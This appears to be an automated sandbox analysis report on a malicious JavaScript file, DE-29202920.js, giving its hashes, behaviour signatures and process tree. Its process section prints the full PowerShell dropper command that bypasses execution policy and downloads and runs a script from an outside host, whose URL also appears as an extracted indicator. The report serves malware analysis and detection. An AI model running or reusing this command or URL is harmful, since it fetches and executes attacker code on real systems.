Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
04-03-2024 16:46
Static task
static1
Behavioral task
behavioral1
Sample
DE-29202920.js
Resource
win7-20240215-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
DE-29202920.js
Resource
win10v2004-20240226-en
11 signatures
150 seconds
General
-
Target
DE-29202920.js
-
Size
55KB
-
MD5
8c1a5db42e7151f6fc6c620a965aafa0
-
SHA1
971130c6a951e64373c8dcbffaa8f4e31f786c6d
-
SHA256
29753f0ec51bd0f7d69139ad2b359333c6d1aed2937a2e16982c1a2fee3bb97c
-
SHA512
63a2bf1ae93cde80100ca1ebd6f9dec0742b82152591b9e30f44578f7064951f38b5649f9ffac58aaefe4ddfee94c2b8d39dbfdf2cf5f666cf2edf2920175175
-
SSDEEP
1536:GeUup4MVH3rQgHZ87RQ5Xlt/xcvZ6P2E8ANJqO:Vbx885xlt/xcveZF
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2200 powershell.exe 4 2200 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2200 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1996 wrote to memory of 2200 1996 wscript.exe 28 PID 1996 wrote to memory of 2200 1996 wscript.exe 28 PID 1996 wrote to memory of 2200 1996 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\DE-29202920.js1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-